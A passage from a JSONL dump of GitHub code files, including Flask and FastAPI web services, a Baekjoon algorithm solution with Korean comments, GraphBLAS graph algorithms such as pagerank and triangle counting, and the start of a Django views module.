{"api_name": "TeletextApp.TeletextApp", "line_number": 56, "usage_type": "call"}, {"api_name": "sys.argv", "line_number": 56, "usage_type": "attribute"}, {"api_name": "sys.exit", "line_number": 63, "usage_type": "call"}]} +{"seq_id": "9671636402", "text": "from flask import Flask, jsonify, request\nfrom flask_cors import CORS\nfrom data_loader import update_database\nfrom mongo import mongo_driver\nfrom bson.json_util import dumps\nimport pandas as pd\nimport json\nimport api_functions as api\n\n# Establish a database connection\nDB_NAME = \"reviews-db\"\nCOLLECTION_NAME = \"reviews-collection\"\n\n# base route for this api version\nbase_api_route = '/api/v0/'\n\ndb = mongo_driver()\n\n# PreCompute the instructor and course lists\ninstructor_list = api.SearchAutocomplete(db, 'instructor')\ncourse_list = api.SearchAutocomplete(db, 'course')\n\napp = Flask(__name__)\nCORS(app)\n\n# useful for testing\n# curl -i http://localhost:5050/api/v0/\n\n@app.route('/')\ndef hello_world():\n return 'Ping <a href=\"/api/v0/\">/api/v0/</a> for api'.format(str(request.remote_addr))\n\n@app.route(base_api_route, methods=['GET'])\ndef root_api():\n return jsonify({'message': 'You have reached api root endpoint. Please see the Github page for information on the endings to hit: https://github.com/stev-ou/stev-api'})\n\n# Search for all entries for autocomplete\n@app.route(base_api_route+'<string:search_type>/all')\ndef course_autocomplete_api(search_type):\n if search_type == 'instructors':\n return jsonify({'result':instructor_list})\n elif search_type =='courses':\n return jsonify({'result':course_list})\n else:\n return jsonify({})\n\n### APIs for Course search\ncourse_suffix_function_map = {'figure1':api.CourseFig1Table, 'figure2':api.CourseFig2Chart, \n'figure3':api.CourseFig3Timeseries, 'figure4':api.CourseFig4TableBar}\n\n@app.route(base_api_route+'courses/<string:course_uuid>/<string:api_suffix>', methods=['GET'])\ndef course_figure_apis(course_uuid, api_suffix):\n func = course_suffix_function_map[api_suffix]\n response = func(db, course_uuid)\n return jsonify(response)\n\n## APIs for Instructor Search\ninstr_suffix_function_map = {'figure1':api.InstructorFig1Table, 'figure2':api.InstructorFig2Timeseries, \n'figure3':api.InstructorFig3TableBar, 'chip':api.InstructorChipAPI}\n\n@app.route(base_api_route+'instructors/<int:instructor_id>/<string:api_suffix>', methods=['GET'])\ndef instructor_figure_apis(instructor_id, api_suffix):\n func = instr_suffix_function_map[api_suffix]\n response = func(db, instructor_id)\n return jsonify(response)\n\nif __name__ == '__main__':\n print(\"Updating database...\")\n update_database(force_update=False)\n print(\"Done.\")\n print(\"Starting server listening on port 5050...\")\n app.run(host='0.0.0.0', port=5050)\n", "repo_name": "stev-ou/stev-api", "sub_path": "server.py", "file_name": "server.py", "file_ext": "py", "file_size_in_byte": 2514, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "mongo.mongo_driver", "line_number": 17, "usage_type": "call"}, {"api_name": "api_functions.SearchAutocomplete", "line_number": 20, "usage_type": "call"}, {"api_name": "api_functions.SearchAutocomplete", "line_number": 21, "usage_type": "call"}, {"api_name": "flask.Flask", "line_number": 23, "usage_type": "call"}, {"api_name": "flask_cors.CORS", "line_number": 24, "usage_type": "call"}, {"api_name": "flask.request.remote_addr", "line_number": 31, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 31, "usage_type": "name"}, {"api_name": "flask.jsonify", "line_number": 35, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 41, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 43, "usage_type": "call"}, {"api_name": "flask.jsonify", "line_number": 45, "usage_type": "call"}, {"api_name": "api_functions.CourseFig1Table", "line_number": 48, "usage_type": "attribute"}, {"api_name": "api_functions.CourseFig2Chart", "line_number": 48, "usage_type": "attribute"}, {"api_name": "api_functions.CourseFig3Timeseries", "line_number": 49, "usage_type": "attribute"}, {"api_name": "api_functions.CourseFig4TableBar", "line_number": 49, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 55, "usage_type": "call"}, {"api_name": "api_functions.InstructorFig1Table", "line_number": 58, "usage_type": "attribute"}, {"api_name": "api_functions.InstructorFig2Timeseries", "line_number": 58, "usage_type": "attribute"}, {"api_name": "api_functions.InstructorFig3TableBar", "line_number": 59, "usage_type": "attribute"}, {"api_name": "api_functions.InstructorChipAPI", "line_number": 59, "usage_type": "attribute"}, {"api_name": "flask.jsonify", "line_number": 65, "usage_type": "call"}, {"api_name": "data_loader.update_database", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "74729726047", "text": "# #최대값을 구하는 문제이기 때문에 N개의 알파벳이 주어지면\n# #알파벳을 9부터 큰 순서대로 N개 바꾸면됨\n# from sys import stdin\n# alpha = dict()##문자값과 숫자 변환시켜주는 배열\n# def calc(a, letters, d):\n# m = len(letters)\n# sum = 0\n# for i in range(m):\n# alpha[letters[i]] = d[i]\n# for word in a:\n# now = 0\n# for char in word:\n# now = now*10+ alpha[char]\n# sum+=now\n# return sum\n# def next_permutation(N, A):\n# ans = []\n# i = N - 1\n# while i > 0 and A[i] <= A[i - 1]: # 내림차순인지 검사한다.\n# i -= 1\n# if i <= 0:\n# return False\n# j = N - 1\n# while A[j] <= A[i - 1]: # 뒷 숫자들은 이미 내림차순이므로 i-1보다 큰 첫번째 수가 최소값\n# j -= 1\n# A[i - 1], A[j] = A[j], A[i - 1]\n# j = N-1\n# while i<j:\n# A[i], A[j] = A[j], A[i]\n# i+=1\n# j-=1\n# return True\n# N = int(input())\n# a = ['']*N\n# letters = set()#중복제거\n# for i in range(N):\n# a[i] = stdin.readline()\n# letters |= set(a[i]) #merge 연산자, letters.update(set(a[i]))와 같음\n# letters = list(letters)\n# m = len(letters)\n# d=[]\n# for i in range(m):\n# d.append(9-i)\n# d.sort()\n# ans = 0\n# while True:\n# now = calc(a, letters, d)\n# if ans<now:\n# ans = now\n# if not next_permutation(m, d):\n# break\n# print(ans)\n#\n\n##문자를 자릿수로 번역\n##가장 수가 큰 문자부터 변환\nimport collections\nfrom collections import defaultdict\n\nn= int(input())\nalpha = defaultdict(int)\nnums=[]\nfor _ in range(n):\n word = list(input())\n nums.append(word)\n for i in range(len(word)):\n alpha[word[i]]+= 10**(len(word)-i-1)\n\nsorted_alpha = collections.OrderedDict(sorted(alpha.items(), key=lambda x:-x[1]))\nmapping={}\ncurr=9\nfor char in sorted_alpha:\n mapping[char] = curr\n curr-=1\n if curr<0:\n break\nres=0\nfor char,count in alpha.items():\n res+=mapping[char]*count\n\nprint(res)\n\n\n\n\n", "repo_name": "inudev5/Algo-study", "sub_path": "BOJ/1339.py", "file_name": "1339.py", "file_ext": "py", "file_size_in_byte": 2053, "program_lang": "python", "lang": "ko", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "collections.defaultdict", "line_number": 61, "usage_type": "call"}, {"api_name": "collections.OrderedDict", "line_number": 69, "usage_type": "call"}]} +{"seq_id": "37998611370", "text": "from flask import Flask, render_template, request, jsonify\nimport requests\n\napp = Flask(__name__)\napp.config[\"DEBUG\"] = True\n\n@app.route(\"/\")\ndef hello():\n return render_template(\"intro.html\")\n\n@app.route(\"/render\")\ndef render():\n return render_template(\"js.html\")\n\n# @app.route(\"/search/<search_query>\")\n# def search(search_query):\n# url = \"https://api.github.com/search/repositories?q=\" + search_query\n# responseJSON = requests.get(url).json()\n# return jsonify(parse_response(responseJSON))\n\n@app.route(\"/search\", methods=[\"GET\", \"POST\"])\ndef search():\n if request.method == \"POST\":\n if request.form[\"user_search\"] == \"\":\n return render_template(\"search.html\", msg = \"Please enter a search request!\")\n else: \n url = \"https://api.github.com/search/repositories?q=\" + request.form[\"user_search\"]\n try:\n response_dict = requests.get(url).json()\n except: #connection error\n return render_template(\"search.html\", msg = \"Please enter your search request!\")\n else:\n # if not response_dict[\"items\"]: #error response\n # print response_dict\n # return render_template(\"search.html\", msg = \"No results found! Enter another search request: \")\n # # return jsonify(parse_response(response_dict))\n # else: \n return render_template(\"results.html\", user_search = request.form[\"user_search\"], gh_data = response_dict)\n else: # request.method == \"GET\"\n return render_template(\"search.html\")\n\ndef parse_response(response_dict):\n clean_dict = {\n \"total_count\": response_dict[\"total_count\"],\n \"items\":[]\n }\n for repo in response_dict[\"items\"]:\n clean_repo = {\n \"name\": repo[\"name\"],\n \"owner\": {\n \"login\": repo[\"owner\"][\"login\"],\n \"avatar_url\": repo[\"owner\"][\"avatar_url\"],\n \"html_url\": repo[\"owner\"][\"html_url\"]\n },\n \"html_url\": repo[\"html_url\"],\n \"description\": repo[\"description\"]\n }\n clean_dict[\"items\"].append(clean_repo)\n return clean_dict\n\n@app.errorhandler(404)\ndef page_not_found(error):\n return \"Sorry, this page was not found.\", 404\n\nif __name__ == \"__main__\":\n app.run(host=\"0.0.0.0\")", "repo_name": "gzgracez/testFlask", "sub_path": "app.py", "file_name": "app.py", "file_ext": "py", "file_size_in_byte": 2359, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 1, "dataset": "github-code", "pt": "86", "api": [{"api_name": "flask.Flask", "line_number": 4, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 9, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 13, "usage_type": "call"}, {"api_name": "flask.request.method", "line_number": 23, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 23, "usage_type": "name"}, {"api_name": "flask.request.form", "line_number": 24, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 24, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 25, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 27, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 27, "usage_type": "name"}, {"api_name": "requests.get", "line_number": 29, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 31, "usage_type": "call"}, {"api_name": "flask.render_template", "line_number": 38, "usage_type": "call"}, {"api_name": "flask.request.form", "line_number": 38, "usage_type": "attribute"}, {"api_name": "flask.request", "line_number": 38, "usage_type": "name"}, {"api_name": "flask.render_template", "line_number": 40, "usage_type": "call"}]} +{"seq_id": "6386449690", "text": "from metagraph import concrete_algorithm, NodeID\nfrom metagraph.plugins import has_grblas\nfrom metagraph.plugins.core import exceptions\nfrom typing import Tuple, Iterable, Any, Union, Optional\nimport numpy as np\n\nif has_grblas:\n import grblas as gb\n from .types import (\n GrblasEdgeSet,\n GrblasEdgeMap,\n GrblasGraph,\n GrblasNodeMap,\n GrblasNodeSet,\n GrblasVectorType,\n )\n\n @concrete_algorithm(\"clustering.triangle_count\")\n def grblas_triangle_count(graph: GrblasGraph) -> int:\n # Burkhardt method: num_triangles = sum(sum(A @ A) * A) / 6\n # We do it in two steps: a matrix multiplication then a reduction\n node_list, _ = graph.nodes.to_values()\n A = graph.value[node_list, node_list].new()\n val = A.mxm(\n A.T, # Transpose here assumes symmetric matrix stored by row (the default for SuiteSparse:GraphBLAS)\n gb.semiring.plus_pair[\n gb.dtypes.UINT64\n ], # `pair` binary operator returns 1; be dtype-agnostic\n ).new(\n mask=A.S\n ) # Using a (structural) mask is equivalent to the elementwise multiplication step\n return val.reduce_scalar().value // 6\n\n @concrete_algorithm(\"centrality.pagerank\")\n def grblas_pagerank(\n graph: GrblasGraph, damping: float, maxiter: int, tolerance: float\n ) -> GrblasNodeMap:\n # `scale_edges` matrix does the bulk of the work; it's what distributes\n # the current value of a vertex to its neighbors\n A = graph.value\n N = A.ncols\n scale_edges = A.apply(gb.unary.one).new(dtype=float)\n node_scale = scale_edges.reduce_rows().new() # num edges\n node_scale << node_scale.apply(gb.unary.minv) # 1 / num_edges\n index, vals = node_scale.to_values() # TODO: implement diag and use here\n node_scale_diag = gb.Matrix.from_values(index, index, vals, ncols=N, nrows=N)\n scale_edges(mask=scale_edges.S)[:, :] = damping\n scale_edges << scale_edges.T.mxm(node_scale_diag) # 0.85 / num_edges\n\n # `base` vector gets added to the result every iteration\n base = gb.Vector.new(float, N)\n base[:] = (1 - damping) / N\n\n # `r` vector holds the results\n r = gb.Vector.new(float, N)\n r[:] = 1 / N\n\n for i in range(maxiter):\n prev_r = r.dup()\n r << scale_edges.mxv(r)\n r << r.ewise_add(base, gb.monoid.plus)\n # now calculate the difference and check the tolerance\n prev_r << prev_r.ewise_mult(r, gb.binary.minus)\n prev_r << prev_r.apply(gb.unary.abs)\n err = prev_r.reduce().value\n if err < N * tolerance:\n break\n else:\n raise exceptions.ConvergenceError(\n f\"failed to converge within {maxiter} iterations\"\n )\n return GrblasNodeMap(r)\n\n @concrete_algorithm(\"util.graph.build\")\n def grblas_graph_build(\n edges: Union[GrblasEdgeSet, GrblasEdgeMap],\n nodes: Union[GrblasNodeSet, GrblasNodeMap, None],\n ) -> GrblasGraph:\n aprops = {\n \"edge_type\": \"map\" if isinstance(edges, GrblasEdgeMap) else \"set\",\n \"node_type\": \"map\" if isinstance(nodes, GrblasNodeMap) else \"set\",\n }\n m = edges.value\n if nodes is not None:\n nodes = nodes.value\n size = nodes.size\n if m.nrows < size:\n resized = gb.Matrix.new(m.dtype, nrows=size, ncols=size)\n resized[: m.nrows, : m.nrows] << m\n m = resized\n return GrblasGraph(m, nodes=nodes, aprops=aprops)\n\n @concrete_algorithm(\"subgraph.extract_subgraph\")\n def grblas_extract_subgraph(\n graph: GrblasGraph, nodes: GrblasNodeSet\n ) -> GrblasGraph:\n aprops = GrblasGraph.Type.compute_abstract_properties(\n graph, {\"is_directed\", \"node_type\", \"edge_type\", \"node_dtype\", \"edge_dtype\"}\n )\n g = graph.value\n chosen_nodes, _ = nodes.value.to_values()\n g2 = gb.Matrix.new(g.dtype, g.nrows, g.ncols)\n g2[chosen_nodes, chosen_nodes] << g[chosen_nodes, chosen_nodes].new()\n\n n = graph.nodes\n n2 = gb.Vector.new(n.dtype, n.size)\n n2[chosen_nodes] << n[chosen_nodes].new()\n gg = GrblasGraph(g2, n2)\n GrblasGraph.Type.preset_abstract_properties(gg, **aprops)\n return gg\n\n @concrete_algorithm(\"subgraph.sample.node_sampling\")\n def grblas_node_sampling(graph: GrblasGraph, p: float) -> GrblasGraph:\n # TODO: move this check into the abstract algorithm layer\n if p <= 0 or p > 1: # pragma: no cover\n raise ValueError(f\"Probability `p` must be between 0 and 1, found {p}\")\n all_nodes, _ = graph.nodes.to_values()\n chosen_indices = np.random.random(len(all_nodes)) < p\n chosen_nodes = all_nodes[chosen_indices]\n chosen_nodes = gb.Vector.from_values(chosen_nodes, np.ones_like(chosen_nodes))\n return grblas_extract_subgraph(graph, GrblasNodeSet(chosen_nodes))\n\n @concrete_algorithm(\"subgraph.sample.edge_sampling\")\n def grblas_edge_sampling(graph: GrblasGraph, p: float) -> GrblasGraph:\n # TODO: move this check into the abstract algorithm layer\n if p <= 0 or p > 1: # pragma: no cover\n raise ValueError(f\"Probability `p` must be between 0 and 1, found {p}\")\n aprops = GrblasGraph.Type.compute_abstract_properties(graph, \"node_type\")\n rows, cols, vals = graph.value.to_values()\n chosen_indices = np.random.random(len(rows)) < p\n rows = rows[chosen_indices]\n cols = cols[chosen_indices]\n vals = vals[chosen_indices]\n chosen_nodes = np.intersect1d(rows, cols)\n m = gb.Matrix.from_values(rows, cols, vals)\n if aprops[\"node_type\"] == \"map\":\n nidx, nvals = graph.nodes.to_values()\n nidx = np.array(nidx)\n nvals = np.array(nvals)[nidx.searchsorted(chosen_nodes)]\n nodes = gb.Vector.from_values(chosen_nodes, nvals)\n else:\n nodes = gb.Vector.from_values(chosen_nodes, np.ones_like(chosen_nodes))\n return GrblasGraph(m, nodes)\n\n @concrete_algorithm(\"subgraph.sample.ties\")\n def grblas_totally_induced_edge_sampling(\n graph: GrblasGraph, p: float\n ) -> GrblasGraph:\n # TODO: move this check into the abstract algorithm layer\n if p <= 0 or p > 1: # pragma: no cover\n raise ValueError(f\"Probability `p` must be between 0 and 1, found {p}\")\n aprops = GrblasGraph.Type.compute_abstract_properties(graph, \"is_directed\")\n if not aprops[\"is_directed\"]:\n # For undirected graphs, cut the probability in half to avoid overcounting edges\n p /= 2\n rows, cols, vals = graph.value.to_values()\n chosen_indices = np.random.random(len(rows)) < p\n rows = rows[chosen_indices]\n cols = cols[chosen_indices]\n chosen_nodes = np.union1d(rows, cols)\n chosen_nodes = gb.Vector.from_values(chosen_nodes, np.ones_like(chosen_nodes))\n gg = grblas_extract_subgraph(graph, GrblasNodeSet(chosen_nodes))\n return gg\n", "repo_name": "metagraph-dev/metagraph", "sub_path": "metagraph/plugins/graphblas/algorithms.py", "file_name": "algorithms.py", "file_ext": "py", "file_size_in_byte": 7185, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 25, "dataset": "github-code", "pt": "88", "api": [{"api_name": "metagraph.plugins.has_grblas", "line_number": 7, "usage_type": "name"}, {"api_name": "types.GrblasGraph", "line_number": 19, "usage_type": "name"}, {"api_name": "grblas.semiring", "line_number": 26, "usage_type": "attribute"}, {"api_name": "grblas.dtypes", "line_number": 27, "usage_type": "attribute"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 18, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 36, "usage_type": "name"}, {"api_name": "grblas.unary", "line_number": 42, "usage_type": "attribute"}, {"api_name": "grblas.unary", "line_number": 44, "usage_type": "attribute"}, {"api_name": "grblas.Matrix.from_values", "line_number": 46, "usage_type": "call"}, {"api_name": "grblas.Matrix", "line_number": 46, "usage_type": "attribute"}, {"api_name": "grblas.Vector.new", "line_number": 51, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 51, "usage_type": "attribute"}, {"api_name": "grblas.Vector.new", "line_number": 55, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 55, "usage_type": "attribute"}, {"api_name": "grblas.monoid", "line_number": 61, "usage_type": "attribute"}, {"api_name": "grblas.binary", "line_number": 63, "usage_type": "attribute"}, {"api_name": "grblas.unary", "line_number": 64, "usage_type": "attribute"}, {"api_name": "metagraph.plugins.core.exceptions.ConvergenceError", "line_number": 69, "usage_type": "call"}, {"api_name": "metagraph.plugins.core.exceptions", "line_number": 69, "usage_type": "name"}, {"api_name": "types.GrblasNodeMap", "line_number": 72, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 34, "usage_type": "call"}, {"api_name": "types.GrblasNodeMap", "line_number": 37, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 76, "usage_type": "name"}, {"api_name": "types.GrblasEdgeSet", "line_number": 76, "usage_type": "name"}, {"api_name": "types.GrblasEdgeMap", "line_number": 76, "usage_type": "name"}, {"api_name": "typing.Union", "line_number": 77, "usage_type": "name"}, {"api_name": "types.GrblasNodeSet", "line_number": 77, "usage_type": "name"}, {"api_name": "types.GrblasNodeMap", "line_number": 77, "usage_type": "name"}, {"api_name": "types.GrblasEdgeMap", "line_number": 80, "usage_type": "argument"}, {"api_name": "types.GrblasNodeMap", "line_number": 81, "usage_type": "argument"}, {"api_name": "grblas.Matrix.new", "line_number": 88, "usage_type": "call"}, {"api_name": "grblas.Matrix", "line_number": 88, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 91, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 74, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 78, "usage_type": "name"}, {"api_name": "types.GrblasGraph", "line_number": 95, "usage_type": "name"}, {"api_name": "types.GrblasNodeSet", "line_number": 95, "usage_type": "name"}, {"api_name": "types.GrblasGraph.Type.compute_abstract_properties", "line_number": 97, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type", "line_number": 97, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 97, "usage_type": "name"}, {"api_name": "grblas.Matrix.new", "line_number": 102, "usage_type": "call"}, {"api_name": "grblas.Matrix", "line_number": 102, "usage_type": "attribute"}, {"api_name": "grblas.Vector.new", "line_number": 106, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 106, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 108, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type.preset_abstract_properties", "line_number": 109, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type", "line_number": 109, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 109, "usage_type": "name"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 93, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 96, "usage_type": "name"}, {"api_name": "types.GrblasGraph", "line_number": 113, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 118, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 118, "usage_type": "attribute"}, {"api_name": "grblas.Vector.from_values", "line_number": 120, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 120, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 120, "usage_type": "call"}, {"api_name": "types.GrblasNodeSet", "line_number": 121, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 112, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 124, "usage_type": "name"}, {"api_name": "types.GrblasGraph.Type.compute_abstract_properties", "line_number": 128, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type", "line_number": 128, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 128, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 130, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 130, "usage_type": "attribute"}, {"api_name": "numpy.intersect1d", "line_number": 134, "usage_type": "call"}, {"api_name": "grblas.Matrix.from_values", "line_number": 135, "usage_type": "call"}, {"api_name": "grblas.Matrix", "line_number": 135, "usage_type": "attribute"}, {"api_name": "numpy.array", "line_number": 138, "usage_type": "call"}, {"api_name": "numpy.array", "line_number": 139, "usage_type": "call"}, {"api_name": "grblas.Vector.from_values", "line_number": 140, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 140, "usage_type": "attribute"}, {"api_name": "grblas.Vector.from_values", "line_number": 142, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 142, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 142, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 143, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 123, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 147, "usage_type": "name"}, {"api_name": "types.GrblasGraph.Type.compute_abstract_properties", "line_number": 152, "usage_type": "call"}, {"api_name": "types.GrblasGraph.Type", "line_number": 152, "usage_type": "attribute"}, {"api_name": "types.GrblasGraph", "line_number": 152, "usage_type": "name"}, {"api_name": "numpy.random.random", "line_number": 157, "usage_type": "call"}, {"api_name": "numpy.random", "line_number": 157, "usage_type": "attribute"}, {"api_name": "numpy.union1d", "line_number": 160, "usage_type": "call"}, {"api_name": "grblas.Vector.from_values", "line_number": 161, "usage_type": "call"}, {"api_name": "grblas.Vector", "line_number": 161, "usage_type": "attribute"}, {"api_name": "numpy.ones_like", "line_number": 161, "usage_type": "call"}, {"api_name": "types.GrblasNodeSet", "line_number": 162, "usage_type": "call"}, {"api_name": "metagraph.concrete_algorithm", "line_number": 145, "usage_type": "call"}, {"api_name": "types.GrblasGraph", "line_number": 148, "usage_type": "name"}]} +{"seq_id": "42543221339", "text": "from typing import List\n\nfrom fastapi import APIRouter\nfrom sqlmodel import select\n\nfrom databases.db import get_db_session\nfrom graphql_app.schemas.rents import RentReadType, RentCreateType\nfrom models.films_and_rents import Rent\n\nrouter = APIRouter()\n\nsession = get_db_session()\n\n\n# Rent Related Routes\ndef get_all_rents() -> List[RentReadType]:\n session.rollback()\n statement = select(Rent)\n results = session.exec(statement).all()\n\n results_strawberry = [RentReadType.from_pydantic(rent)\n for rent in results]\n\n return results_strawberry\n\n\ndef get_by_id_a_rent(rent_id: int) -> RentReadType:\n session.rollback()\n statement = select(Rent).where(Rent.id == rent_id)\n result = session.exec(statement).first()\n\n if result is None:\n raise Exception(\"Resource Not Found\")\n\n return RentReadType.from_pydantic(result)\n\n\ndef create_a_rent(rent_create_type: RentCreateType) -> RentReadType:\n session.rollback()\n rent = rent_create_type.to_pydantic()\n new_rent = Rent(film_id=rent.film_id,\n client_id=rent.client_id,\n amount=rent.amount,\n start_date=rent.start_date,\n return_date=rent.return_date,\n actual_return_date=rent.actual_return_date,\n state=rent.state,\n cost=Rent.get_cost(rent))\n\n session.add(new_rent)\n\n session.commit()\n\n return RentReadType.from_pydantic(new_rent)\n\n\ndef update_a_rent(\n rent_id: int, rent_create_type: RentCreateType) -> RentReadType:\n session.rollback()\n rent = rent_create_type.to_pydantic()\n\n statement = select(Rent).where(Rent.id == rent_id)\n\n result = session.exec(statement).first()\n\n if result is None:\n raise Exception(\"Resource Not Found\")\n\n result.film_id = rent.film_id\n result.client_id = rent.client_id\n result.amount = rent.amount\n result.start_date = rent.start_date\n result.return_date = rent.return_date\n result.actual_return_date = rent.actual_return_date\n result.state = rent.state\n result.cost = Rent.get_cost(rent)\n\n session.commit()\n\n return RentReadType.from_pydantic(result)\n\n\ndef delete_a_rent(rent_id: int) -> RentReadType:\n session.rollback()\n statement = select(Rent).where(Rent.id == rent_id)\n\n result = session.exec(statement).one_or_none()\n\n if result is None:\n raise Exception(\"Resource Not Found\")\n\n session.delete(result)\n session.commit()\n\n return RentReadType.from_pydantic(result)\n", "repo_name": "Thevic16/trainee-python-week-10", "sub_path": "resolvers/rents.py", "file_name": "rents.py", "file_ext": "py", "file_size_in_byte": 2542, "program_lang": "python", "lang": "en", "doc_type": "code", "stars": 0, "dataset": "github-code", "pt": "88", "api": [{"api_name": "fastapi.APIRouter", "line_number": 10, "usage_type": "call"}, {"api_name": "databases.db.get_db_session", "line_number": 12, "usage_type": "call"}, {"api_name": "sqlmodel.select", "line_number": 18, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 18, "usage_type": "argument"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 21, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 21, "usage_type": "name"}, {"api_name": "typing.List", "line_number": 16, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 16, "usage_type": "name"}, {"api_name": "sqlmodel.select", "line_number": 29, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 29, "usage_type": "argument"}, {"api_name": "models.films_and_rents.Rent.id", "line_number": 29, "usage_type": "attribute"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 35, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 35, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 27, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentCreateType", "line_number": 38, "usage_type": "name"}, {"api_name": "models.films_and_rents.Rent", "line_number": 41, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent.get_cost", "line_number": 48, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 48, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 54, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 54, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 38, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentCreateType", "line_number": 58, "usage_type": "name"}, {"api_name": "sqlmodel.select", "line_number": 62, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 62, "usage_type": "argument"}, {"api_name": "models.films_and_rents.Rent.id", "line_number": 62, "usage_type": "attribute"}, {"api_name": "models.films_and_rents.Rent.get_cost", "line_number": 76, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 76, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 80, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 80, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 58, "usage_type": "name"}, {"api_name": "sqlmodel.select", "line_number": 85, "usage_type": "call"}, {"api_name": "models.films_and_rents.Rent", "line_number": 85, "usage_type": "argument"}, {"api_name": "models.films_and_rents.Rent.id", "line_number": 85, "usage_type": "attribute"}, {"api_name": "graphql_app.schemas.rents.RentReadType.from_pydantic", "line_number": 95, "usage_type": "call"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 95, "usage_type": "name"}, {"api_name": "graphql_app.schemas.rents.RentReadType", "line_number": 83, "usage_type": "name"}]} +{"seq_id": "11346723524", "text": "from django.http import HttpResponse\nfrom django.shortcuts import render\nfrom . import forms\nimport io\nimport os\nimport itertools\nimport pandas as pd\nimport numpy as np\nimport matplotlib\nmatplotlib.use(\"TkAgg\")\nimport matplotlib.pyplot as plt\nfrom . import function_pole\nfrom . import function_3d\nfrom . import function_ks\nfrom . import function_ipf\n\nnd = None\nrd = None\nnd1 = None\nrd1 = None\nnd2 = None\nrd2 = None\nnd_dir = None\nrd_dir = None\nphi_dir = None\ntheta_dir = None\nrot_dir = None\ngraph_dir = None\nnd_pla = None\nrd_pla = None\nrot_pla = None\ngraph_pla = None\ndf_xyz = None\n\n\n# PNG画像形式に変換\ndef plt2png():\n buf = io.BytesIO()\n plt.savefig(buf, format='png', dpi=200)\n s = buf.getvalue()\n buf.close()\n return s\n\n\n# Create your views here.\ndef menu(request):\n return render(request, 'analysis/menu.html')\n\n\ndef pole_ebsd(request):\n global nd\n global rd\n f1 = forms.NdForm()\n f2 = forms.RdForm()\n nd_h = request.POST.get('nd_h', 0)\n nd_k = request.POST.get('nd_k', 0)\n nd_l = 